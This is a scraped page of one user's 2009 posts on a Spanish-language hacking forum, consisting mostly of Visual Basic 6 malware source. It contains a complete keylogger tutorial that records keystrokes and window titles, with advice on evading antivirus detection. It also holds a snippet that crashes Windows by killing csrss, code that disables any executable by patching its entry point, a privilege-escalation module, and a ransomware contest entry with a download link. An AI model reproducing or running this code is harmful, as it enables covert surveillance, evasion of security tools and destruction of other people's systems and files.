|
81
|
Programación / Programación Visual Basic / [SNIPPET] mNativeTokens {RtlAdjustPrivilege - API Nativa}
|
en: 18 Agosto 2009, 17:33 pm
|
'--------------------------------------------------------------------------------------- ' Module : mNativeTokens ' Author : Karcrack ' Now$ : 18/08/2009 17:18 ' Used for? : Get Privileges using Native API (RtlAdjustPrivilege) ' Reference : ' http://forum.sysinternals.com/forum_posts.asp?TID=15745 '--------------------------------------------------------------------------------------- Option Explicit 'NTDLL Private Declare Function RtlAdjustPrivilege Lib "NTDLL" (ByVal Privilege As Long, ByVal bEnablePrivilege As Long, ByVal bCurrentThread As Long, ByRef OldState As Long) As Long Public Enum PRIVILEGES_ENUM SeAssignPrimaryTokenPrivilege = 3 ' Replace a process-level token SeAuditPrivilege = 21 ' Generate security audits. SeBackupPrivilege = 17 ' Grant all file read access (ACL Bypass) SeChangeNotifyPrivilege = 23 ' Receive file/folder change notifications SeCreateGlobalPrivilege = 30 ' Create global objects SeCreatePagefilePrivilege = 15 ' Create pagefile SeCreatePermanentPrivilege = 16 ' Create permanent shared object SeCreateSymbolicLinkPrivilege = 33 ' (W.VISTA) Create symbolic links SeCreateTokenPrivilege = 2 ' Create a token SeDebugPrivilege = 20 ' Open any process (ACL Bypass) SeEnableDelegationPrivilege = 27 ' (W.2000) Trust users for delegation SeImpersonatePrivilege = 29 ' Enable thread impersonation SeIncreaseBasePriorityPrivilege = 14 ' Increase process priority SeIncreaseQuotaPrivilege = 5 ' Increase process memory quota SeIncreaseWorkingSetPrivilege = 30 ' (W.VISTA) Increase process WS SeLoadDriverPrivilege = 10 ' Load/Unload driver SeLockMemoryPrivilege = 4 ' Lock pages in memory SeMachineAccountPrivilege = 6 ' Create user account SeManageVolumePrivilege = 28 ' Manage files on a volume SeProfileSingleProcessPrivilege = 13 ' Gather process profiling info SeRelabelPrivilege = 32 ' Modify object label SeRemoteShutdownPrivilege = 24 ' Shutdown a remote computer SeRestorePrivilege = 18 ' Grant all file write access (ACL Bypass) SeSecurityPrivilege = 8 ' Manage auditying and security log SeShutdownPrivilege = 19 ' Initiate Shutdown SeSyncAgentPrivilege = 26 ' (W.2000) Use directory sync services SeSystemEnvironmentPrivilege = 22 ' Modify firmware environment values SeSystemProfilePrivilege = 11 ' Gather system profiling info SeSystemtimePrivilege = 12 ' Change Time SeTakeOwnershipPrivilege = 9 ' Change object owner (ACL Bypass) SeTcbPrivilege = 7 ' Idetify as a trusted, protected subsystem SeTimeZonePrivilege = 34 ' (W.VISTA) Change time zone SeTrustedCredManAccessPrivilege = 31 ' (W.VISTA) Access the Credential Manager (trusted caller) SeUndockPrivilege = 25 ' Remove from docking station SeUnsolicitedInputPrivilege = 35 ' (ABSOL33T) Read unsolicited input (from terminal device) End Enum Public Function AsignPrivilege(ByVal lPriv As PRIVILEGES_ENUM, Optional ByVal bEnable As Boolean = True, Optional ByVal bThread As Long = 0, Optional ByRef lOldState As Long) As Boolean AsignPrivilege = (RtlAdjustPrivilege(lPriv, bEnable, bThread, lOldState) = 0) End Function
El Enum es mas largo que el codigo Bueno, creo que esta claro lo que hace este codigo... asigna privilegios a nuestra aplicacion utilizando un API nativa, y evitando hacer las llamadas a varias APIs para hacer esto mismo Saludos
|
|
|
82
|
Programación / Programación Visual Basic / [VB6] Creacion de un Keylogger 'avanzado' {HOOK}
|
en: 17 Agosto 2009, 19:18 pm
|
Este manual forma parte de la #1 CM EZINE...Indice:- Introducción:
- Que es un Keylogger?
- Clases de Keyloggers.
- Para que sirven?
- Al grano:
- APIs.
- Declaraciones, Constantes y Tipos.
- Funciones.
- Código de ejemplo.
- Despedida y consejos.
Introducción:Que es un keylogger?Un keylogger (Key=Tecla Logger=Registrador) es una herramienta de diagnóstico utilizada en el desarrollo de software que se encarga de registrar las pulsaciones que se realizan sobre el teclado, para memorizarlas en un fichero y/o enviarlas a través de Internet. Por lo tanto asumimos que registra las teclas que se presionan en el teclado. Clases de Keyloggers.Bueno, hay varios tipos de keyloggers, yo me voy a centrar en los de Software. Hay tres tipos: - Ring 0: Los que se ejecutan desde el núcleo del sistema, lo que los hace bastante mas difíciles de eliminar.
- Hook: Se ejecutan en Modo Usuario y utilizan un 'Enganche' al sistema, para que cuando se presione una tecla el sistema te advierte. Este es el método que trataremos en la parte practica.
- Otros metodos: Estos son otros metodos, normalmente peores. Por ejemplo, un keylogger que cada cierto intervalo de tiempo compruebe tecla por tecla cual esta presionada.
Para que sirven?Los keyloggers registran cualquier tecla pulsada en el sistema, por lo tanto pueden servir muchas cosas. Desde observar si tus empleados entran a webs a las que no deberían. Hasta para obtener información ajena de forma oculta.
Al grano:APIs:Las apis que usaremos serán las siguientes.: - CopyMemory: Para volcar la información del hook a una variable.
- SetWindowsHookExA: Para establecer el hook al teclado.
- CallNextHookEx: Para continuar con nuestro hook.
- UnhookWindowsHookEx: Para deshacer el hook al teclado.
- GetAsyncKeyState: Para saber si la tecla Shift esta presionada.
- GetForegroundWindow: Para obtener la ventana que tiene el foco.
- GetWindowTextA: Para obtener el texto de una ventana.
Declaraciones, Constantes y Tipos.Constantes: WH_KEYBOARD_LL = 13 : Esta constante contiene el valor que indica al API SetWindowsHookEx que tipo de Hook es. Declaraciones Globales: KBHook : Esta declaración global indica el numero asignado a nuestro Hook de teclado. KeyData: Para almacenar las teclas recogidas antes de almacenarlas. lHwnd : Para almacenar la ultima venta activa. Tipos: KBDLLHOOKSTRUCT : Para obtener la información que nos da el Hook. Funciones:Función para habilitar o deshabilitar el hook al teclado: Public Sub ManageKeylogger(ByVal Enable As Boolean) Select Case Enable Case True KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance,0) Case False Call UnhookWindowsHookEx(KBHook) End Select End Sub
Función para recibir la información del AddressOf: Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long Dim KeyBoardHook As KBDLLHOOKSTRUCT If nCode = 0 Then CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook) With KeyBoardHook If .Flags = 0 Or .Flags = 1 Then If SaveLog(TranslateKey(.VkCode)) > 50 Then Call LogToFile(App.Path & "\Log.log") End If End If End With Else KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam) End If End Function
Función para pasar del valor numérico de la tecla a el valor correspondiente: Private Function TranslateKey(ByVal KeyCode As Long) As String Dim LngShift As Long 'Funcion optimizada para su uso en teclados españoles. LngShift = GetAsyncKeyState(vbKeyShift) If KeyCode >= 58 And KeyCode <= 90 Then TranslateKey = IIf(LngShift <> 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode))) ElseIf KeyCode >= 96 And KeyCode <= 105 Then TranslateKey = Chr(KeyCode - 48) ElseIf KeyCode >= 112 And KeyCode <= 123 Then TranslateKey = "{F" & KeyCode - 111 & "}" Else If KeyCode = 160 Then TranslateKey = "" If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}" If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}" If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}" If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}" If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}" If KeyCode = 32 Then TranslateKey = "{ESPACIO}" If KeyCode = 27 Then TranslateKey = "{ESC}" If KeyCode = 46 Then TranslateKey = "{DEL}" If KeyCode = 36 Then TranslateKey = "{HOME}" If KeyCode = 35 Then TranslateKey = "{END}" If KeyCode = 33 Then TranslateKey = "{PAGE UP}" If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}" If KeyCode = 45 Then TranslateKey = "{PASTE}" If KeyCode = 144 Then TranslateKey = "{NUM}" If KeyCode = 111 Then TranslateKey = "{NUMPAD / }" If KeyCode = 106 Then TranslateKey = "{NUMPAD * }" If KeyCode = 109 Then TranslateKey = "{NUMPAD - }" If KeyCode = 107 Then TranslateKey = "{NUMPAD + }" If KeyCode = 13 Then TranslateKey = "{ENTER}" If KeyCode = 8 Then TranslateKey = "{BACK}" If KeyCode = 221 Then TranslateKey = "{ACCENTO}" If KeyCode = 9 Then TranslateKey = "{TAB}" If KeyCode = 20 Then TranslateKey = "{BLOQ. MAYUS}" If KeyCode = 162 Then TranslateKey = "{STRG LEFT}" If KeyCode = 163 Then TranslateKey = "{STRG DER.}" If KeyCode = 91 Then TranslateKey = "{WINDOWS}" If KeyCode = 164 Then TranslateKey = "{ALT}" If KeyCode = 165 Then TranslateKey = "{ALTGR}" If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}" If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",") If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".") If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-") If KeyCode = 191 Then TranslateKey = IIf(LngShift <> 0, "'", "#") If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+") If KeyCode = 186 Then TranslateKey = IIf(LngShift <> 0, "Ü", "ü") If KeyCode = 192 Then TranslateKey = IIf(LngShift <> 0, "Ö", "ö") If KeyCode = 222 Then TranslateKey = IIf(LngShift <> 0, "Ä", "ä") If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "ß") If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "°", "^") If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0") If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1") If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2") If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "§", "3") If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4") If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5") If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6") If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7") If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8") If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9") If KeyCode = 145 Then TranslateKey = "{ROLL}" If KeyCode = 44 Then TranslateKey = "{PRINT}" If KeyCode = 19 Then TranslateKey = "{PAUSE}" If TranslateKey = "" And KeyCode <> 160 Then TranslateKey = KeyCode End If End Function
Función para guardar la información pulsada en una variable: Public Function SaveLog(ByVal sKey As String) As Double Dim aHwnd As Long Dim WinText As String aHwnd = GetForegroundWindow If aHwnd <> lHwnd Then lHwnd = aHwnd WinText = String$(255, Chr$(0)) Call GetWindowText(aHwnd, WinText, Len(WinText)) WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1) KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now$ & "]" & vbCrLf End If KeyData = KeyData & sKey SaveLog = Len(KeyData) End Function
Función para volcar la variable en un fichero: Public Sub LogToFile(ByVal sPath As String) Open sPath For Binary As #1 Put #1, , KeyData Close #1 End Sub
Código de ejemplo:Option Explicit '||||||||||||||||||||||| '| | '|Autor: Karcrack | '|Fecha: 24/09/08 | '| | '||||||||||||||||||||||| Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long Private Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long) Private Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal vKey As Long) As Integer Private Const WH_KEYBOARD_LL As Long = 13 Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long Public Type KBDLLHOOKSTRUCT VkCode As Long ScanCode As Long Flags As Long Time As Long DwExtraInfo As Long End Type Dim KBHook As Long Dim KeyData As String Dim lHwnd As Long Public Sub ManageKeylogger(ByVal Enable As Boolean) Select Case Enable Case True KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0) Case False Call UnhookWindowsHookEx(KBHook) End Select End Sub Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long Dim KeyBoardHook As KBDLLHOOKSTRUCT If nCode = 0 Then CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook) With KeyBoardHook If .Flags = 0 Or .Flags = 1 Then If SaveLog(TranslateKey(.VkCode)) > 50 Then Call LogToFile(App.Path & "\Log.log") End If End If End With Else KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam) End If End Function Private Function TranslateKey(ByVal KeyCode As Long) As String Dim LngShift As Long 'Funcion optimizada para su uso en teclados españoles. LngShift = GetAsyncKeyState(vbKeyShift) If KeyCode >= 58 And KeyCode <= 90 Then TranslateKey = IIf(LngShift <> 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode))) ElseIf KeyCode >= 96 And KeyCode <= 105 Then TranslateKey = Chr(KeyCode - 48) ElseIf KeyCode >= 112 And KeyCode <= 123 Then TranslateKey = "{F" & KeyCode - 111 & "}" Else If KeyCode = 160 Then TranslateKey = "" If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}" If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}" If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}" If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}" If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}" If KeyCode = 32 Then TranslateKey = "{ESPACIO}" If KeyCode = 27 Then TranslateKey = "{ESC}" If KeyCode = 46 Then TranslateKey = "{DEL}" If KeyCode = 36 Then TranslateKey = "{HOME}" If KeyCode = 35 Then TranslateKey = "{END}" If KeyCode = 33 Then TranslateKey = "{PAGE UP}" If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}" If KeyCode = 45 Then TranslateKey = "{PASTE}" If KeyCode = 144 Then TranslateKey = "{NUM}" If KeyCode = 111 Then TranslateKey = "{NUMPAD / }" If KeyCode = 106 Then TranslateKey = "{NUMPAD * }" If KeyCode = 109 Then TranslateKey = "{NUMPAD - }" If KeyCode = 107 Then TranslateKey = "{NUMPAD + }" If KeyCode = 13 Then TranslateKey = "{ENTER}" If KeyCode = 8 Then TranslateKey = "{BACK}" If KeyCode = 221 Then TranslateKey = "{ACCENTO}" If KeyCode = 9 Then TranslateKey = "{TAB}" If KeyCode = 20 Then TranslateKey = "{BLOQ. MAYUS}" If KeyCode = 162 Then TranslateKey = "{STRG LEFT}" If KeyCode = 163 Then TranslateKey = "{STRG DER.}" If KeyCode = 91 Then TranslateKey = "{WINDOWS}" If KeyCode = 164 Then TranslateKey = "{ALT}" If KeyCode = 165 Then TranslateKey = "{ALTGR}" If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}" If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",") If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".") If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-") If KeyCode = 191 Then TranslateKey = IIf(LngShift <> 0, "'", "#") If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+") If KeyCode = 186 Then TranslateKey = IIf(LngShift <> 0, "Ü", "ü") If KeyCode = 192 Then TranslateKey = IIf(LngShift <> 0, "Ö", "ö") If KeyCode = 222 Then TranslateKey = IIf(LngShift <> 0, "Ä", "ä") If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "ß") If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "°", "^") If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0") If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1") If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2") If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "§", "3") If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4") If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5") If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6") If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7") If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8") If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9") If KeyCode = 145 Then TranslateKey = "{ROLL}" If KeyCode = 44 Then TranslateKey = "{PRINT}" If KeyCode = 19 Then TranslateKey = "{PAUSE}" If TranslateKey = "" And KeyCode <> 160 Then TranslateKey = KeyCode End If End Function Public Function SaveLog(ByVal sKey As String) As Double Dim aHwnd As Long Dim WinText As String aHwnd = GetForegroundWindow If aHwnd <> lHwnd Then lHwnd = aHwnd WinText = String$(255, Chr$(0)) Call GetWindowText(aHwnd, WinText, Len(WinText)) WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1) KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now() & "]" & vbCrLf End If KeyData = KeyData & sKey SaveLog = Len(KeyData) End Function Public Sub LogToFile(ByVal sPath As String) Open sPath For Binary As #1 Put #1, , KeyData Close #1 End Sub
Despedida y consejos.Hasta aquí el manual, me ha llevado aproximadamente escribir y codear el manual 1 hora y 30 minutos... a ver si a la próxima supero mi marca Bueno, recomendaciones, hay muchas... entre ellas no copiéis tal cual el code, porque se hará detectable en cuestión de minutos (si no lo es ya). Para hacer indetectable este código debéis cargar las APIs en ejecución, porque la heuristica salta seguro. Saludos Happy Coding Saludos
|
|
|
83
|
Programación / Programación Visual Basic / [SRC]- mGetAPIPtr, sacar el puntero de un API... nuevo metodo :P
|
en: 11 Agosto 2009, 13:54 pm
|
Bueno, despues de estar investigando he conseguido sacar el Puntero de un API llamando a DllFunctionCall@MSVBVM60.DLL... Como todo programador de VB6 debe saber al llamar un API externa desde VB se llama a DllFunctionCall para sacar el puntero... osea, las APIs declaradas directamente desde el codigo no se agregan a la IAT... Y bueno, decidi aprovecharme de eso Option Explicit '--------------------------------------------------------------------------------------- ' Module : mGetAPIPtr ' Author : Karcrack ' Now$ : 11/08/2009 13:07 ' WebPage : http://www.advancevb.com.ar ' Used for? : Get API Pointer withouth calling any external API ' Thanks. : ' - Cobein: Support and Unicode-ANSI function (= '--------------------------------------------------------------------------------------- 'MSVBVM60 Private Declare Function DllFunctionCall Lib "MSVBVM60" (ByRef typeAPI As tAPICall) As Long Private Type tAPICall ptsLIB As Long ' Pointer to ANSI String that contains Library ptsProc As Long ' Pointer to ANSI String that contains Procedure lReserved As Long ' Just reserved... lPointer As Long ' Pointer to the buffer that will contain temp variables from DllFunctionCall lpBuffer(3) As Long ' Buffer that will contain temp variables End Type Public Function GetAPIPtr(ByVal sLib As String, ByVal sProc As String) As Long Dim tAPI As tAPICall Dim bvLib() As Byte Dim bvMod() As Byte Call Unicode2ANSI(sLib, bvLib) Call Unicode2ANSI(sProc, bvMod) With tAPI .ptsLIB = VarPtr(bvLib(0)) .ptsProc = VarPtr(bvMod(0)) .lReserved = &H40000 .lPointer = VarPtr(.lpBuffer(0)) End With GetAPIPtr = DllFunctionCall(tAPI) End Function 'COBEIN (= Private Sub Unicode2ANSI(ByVal sUNICODE As String, ByRef bvANSI() As Byte) Dim i As Long ReDim bvANSI(Len(sUNICODE)) For i = 1 To Len(sUNICODE) bvANSI(i - 1) = Asc(Mid$(sUNICODE, i, 1)) Next i End Sub
Con esto solo no podemos llamar a las APIs, asi que he modificado el codigo de Cobein del cInvokepara que llama al puntero que le pases... Aqui hay un ejemplo bastante claro:http://www.box.net/shared/tbbihznz6r Ah! Si pretendeis llamar APIs que pidan Strings recordar usar la version UNICODE de esa API (*W)Saludos
|
|
|
84
|
Programación / Programación Visual Basic / [SNIPPET] mBSOD - Revienta tu Windows
|
en: 17 Julio 2009, 13:42 pm
|
'--------------------------------------------------------------------------------------- ' Module : mBSOD ' Author : Karcrack ' Now$ : 16/07/2009 18:08 ' Used for? : Make a BSOD on W$ ' Tested On : W. XP ... W. Vista (Thanks Kiash)... W. Seven (Thanks SkyWeb/Dessa) '--------------------------------------------------------------------------------------- Option Explicit 'NTDLL Private Declare Function CsrGetProcessId Lib "ntdll.dll" () As Long Private Declare Function RtlAdjustPrivilege Lib "ntdll.dll" (ByVal Privilege As Long, ByVal Enable As Long, ByVal Client As Long, WasEnabled As Long) As Long 'KERNEL32 Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Public Sub CrashWindows() Dim hProc As Long Call GetAllPrivilegies hProc = OpenProcess(&H1F0FFF, 0&, CsrGetProcessId) ' &H1F0FFF = PROCESS_ALL_ACCESS Call TerminateProcess(hProc, 0&) End Sub Private Sub GetAllPrivilegies() Dim i As Long For i = 0 To 200: Call RtlAdjustPrivilege(ByVal i&, 1, 0, 0): Next i End Sub
Si alguien puede que lo pruebe en Windows Vista o Windows 7...Gracias por probarlo, Kiash, SkyWeb, Dessa
|
|
|
85
|
Programación / ASM / [FASM-SRC]IsUserAnAdmin [Estrenando SubForo :P]
|
en: 20 Mayo 2009, 18:49 pm
|
Bueno, posteo esto mas que nada para estrenar el SubForo include 'win32ax.inc' entry Main section '.code' code readable executable Main: invoke IsUserAnAdmin test eax, eax jz .No invoke MessageBoxA, 0, Sip, Title, 0 jmp .Exit .No: invoke MessageBoxA, 0, No, Title, 0 .Exit: invoke ExitProcess, 0 ;section '.data' data readable writeable Sip db 'Si', 0 No db 'No', 0 Title db 'Somos Admin?', 0 section '.idata' import data readable library K32, 'KERNEL32.DLL',\ S32, 'SHELL32.DLL',\ U32, 'USER32.DLL' import K32, ExitProcess, 'ExitProcess' import S32, IsUserAnAdmin, 'IsUserAnAdmin' import U32, MessageBoxA, 'MessageBoxA'
Simplemente usa el API de Shell32 llamada 'IsUserAnAdmin' Más información sobre el API: http://msdn.microsoft.com/en-us/library/bb776463.aspx Saludos PD:A disfrutar del SubForo! PD2: Propongo mover los Mensajes relacionados con ASM que hay en Programacion General AQUI!
|
|
|
86
|
Seguridad Informática / Abril negro / [ABRIL NEGRO][MALWARE]Karcrack Ransom
|
en: 28 Abril 2009, 16:24 pm
|
Que es?Esta es el proyecto que presento este año para el Abril Negro ( [Abril Negro 2009] Concurso de desarrollo de malware) Antes que nada definicion de Ransomware: Ransomware es un malware [...] que mediante distintas técnicas imposibilita al dueño de un documento acceder al mismo. El modo más comúnmente utilizado es cifrar con clave dicho documento y dejar instrucciones al usuario para obtenerla, posterior al pago de "rescate". Como esto es un concurso no voy a pedir rescate Como trabaja?Estos son los pasos que sigue el Malware: - Enumera los ficheros accedidos recientemente
- Obtiene la ruta de estos ficheros y comprueba que todavia existen
- Los 'cifra' y agrega el codigo que mostrará el mensaje pidiendo 'rescate'
Por cierto, el codigo lleva una encriptacion bastante debil. Descarga?Aqui esta: http://www.box.net/shared/3oull7lb59 Solo queda decir que este es el primer malware que distribuyo Saludos
|
|
|
87
|
Programación / Programación Visual Basic / [SOURCE][RET Exe Corruption] Corrompe cualquier Ejecutable
|
en: 7 Abril 2009, 19:01 pm
|
Codigo relativo a este post:
'--------------------------------------------------------------------------------------- ' Modulo : mPatchExe ' Autor : Karcrack ' Fecha-Hora: 07/04/2009 18:43 ' Finalidad : Deshabilita cualquier ejecutable '--------------------------------------------------------------------------------------- Option Explicit Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long) Private Enum ImageSignatureTypes IMAGE_DOS_SIGNATURE = &H5A4D ''\\ MZ IMAGE_OS2_SIGNATURE = &H454E ''\\ NE IMAGE_OS2_SIGNATURE_LE = &H454C ''\\ LE IMAGE_VXD_SIGNATURE = &H454C ''\\ LE IMAGE_NT_SIGNATURE = &H4550 ''\\ PE\0\0 End Enum Private Type IMAGE_DOS_HEADER e_magic As Integer ' Magic number e_cblp As Integer ' Bytes on last page of file e_cp As Integer ' Pages in file e_crlc As Integer ' Relocations e_cparhdr As Integer ' Size of header in paragraphs e_minalloc As Integer ' Minimum extra paragraphs needed e_maxalloc As Integer ' Maximum extra paragraphs needed e_ss As Integer ' Initial (relative) SS value e_sp As Integer ' Initial SP value e_csum As Integer ' Checksum e_ip As Integer ' Initial IP value e_cs As Integer ' Initial (relative) CS value e_lfarlc As Integer ' File address of relocation table e_ovno As Integer ' Overlay number e_res(0 To 3) As Integer ' Reserved words e_oemid As Integer ' OEM identifier (for e_oeminfo) e_oeminfo As Integer ' OEM information; e_oemid specific e_res2(0 To 9) As Integer ' Reserved words e_lfanew As Long ' File address of new exe header End Type ' MSDOS File header Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer characteristics As Integer End Type ' Directory format. Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type ' Optional header format. Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16 Private Type IMAGE_OPTIONAL_HEADER ' Standard fields. Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ' NT additional fields. ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type ' Section header Const IMAGE_SIZEOF_SHORT_NAME = 8 Private Type IMAGE_SECTION_HEADER SecName As String * IMAGE_SIZEOF_SHORT_NAME VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer characteristics As Long End Type '--------------------------------------------------------------------------------------- ' Procedimiento : PatchExe ' Autor : Karcrack ' Fecha : 07/04/2009 ' Parametro(s) : sPath -> La ruta del fichero ' Return : True si todo fue bien '--------------------------------------------------------------------------------------- Public Function PatchExe(ByVal sPath As String) As Boolean On Error GoTo Fallo Dim IDH As IMAGE_DOS_HEADER Dim INH As IMAGE_NT_HEADERS Dim ISH() As IMAGE_SECTION_HEADER Dim bvCode() As Byte Dim PE As Long Dim i As Long Dim Section As Long bvCode = ReadFile(sPath) 'Leemos el fichero Call CopyMemory(IDH, bvCode(0), Len(IDH)) 'Leemos la info del PE Call CopyMemory(INH, bvCode(IDH.e_lfanew), Len(INH)) 'Leemos la info del PE For i = 0 To INH.FileHeader.NumberOfSections - 1 ReDim Preserve ISH(0 To i) Call CopyMemory(ISH(i), bvCode(IDH.e_lfanew + Len(INH) + Len(ISH(i)) * i), Len(ISH(i))) If (INH.OptionalHeader.AddressOfEntryPoint => ISH(i).VirtualAddress) And (INH.OptionalHeader.AddressOfEntryPoint =< ISH(i).VirtualAddress + ISH(i).VirtualSize) Then Section = i Exit For End If Next i bvCode(INH.OptionalHeader.AddressOfEntryPoint - ISH(i).VirtualAddress + ISH(i).PointerToRawData) = &HC3 'Parcheamos el fichero (C3=RET) Call SaveFile(bvCode, sPath) PatchExe = True 'Todo funciono Exit Function 'Salimos Fallo: PatchExe = False 'Algo ha ido mal :S End Function '--------------------------------------------------------------------------------------- ' Procedimiento : ReadFile ' Autor : Karcrack ' Fecha : 07/04/2009 ' Parametro(s) : sPath -> La ruta del fichero ' Return : Devuelve un Byte array con los bytes del fichero '--------------------------------------------------------------------------------------- Private Function ReadFile(ByVal sPath As String) As Byte() Dim bvTmp() As Byte Open sPath For Binary As #1 ReDim bvTmp(0 To LOF(1) - 1) Get #1, , bvTmp Close #1 ReadFile = bvTmp End Function '--------------------------------------------------------------------------------------- ' Procedimiento : SaveFile ' Autor : Karcrack ' Fecha : 07/04/2009 ' Parametro(s) : bvData() -> Array de datos ' sPath -> Ruta de guardado '--------------------------------------------------------------------------------------- Private Sub SaveFile(ByRef bvData() As Byte, ByVal sPath As String) Open sPath For Binary As #1 Put #1, , bvData Close #1 End Sub
|
|
|
88
|
Seguridad Informática / Abril negro / [RET Exe Corruption] Corrompe cualquier Ejecutable
|
en: 7 Abril 2009, 19:00 pm
|
Buenas tardes Hoy os presento este metodo de 'corrupcion' de ejecutables. Desde que vi el metodo que posteo Mad estuve pensando: http://foro.elhacker.net/analisis_y_diseno_de_malware/metodo_ifeo_bug_image_file_execution_options-t249670.0.html Este metodo modifica el ejecutable para que nada mas abrirse se cierre, agregando un RET al pimer byte ejecutado.Que tiene de especial?- Solo modifica un Byte
- Trabaja con el PE
Problemas? Solo uno: - Necesitas permisos de escritura en el fichero, si esta abierto no podras...
Pasos a seguir para aplicar este metodo:- Se obtiene el Entry Point RVA del fichero
- Se pasa a RAW
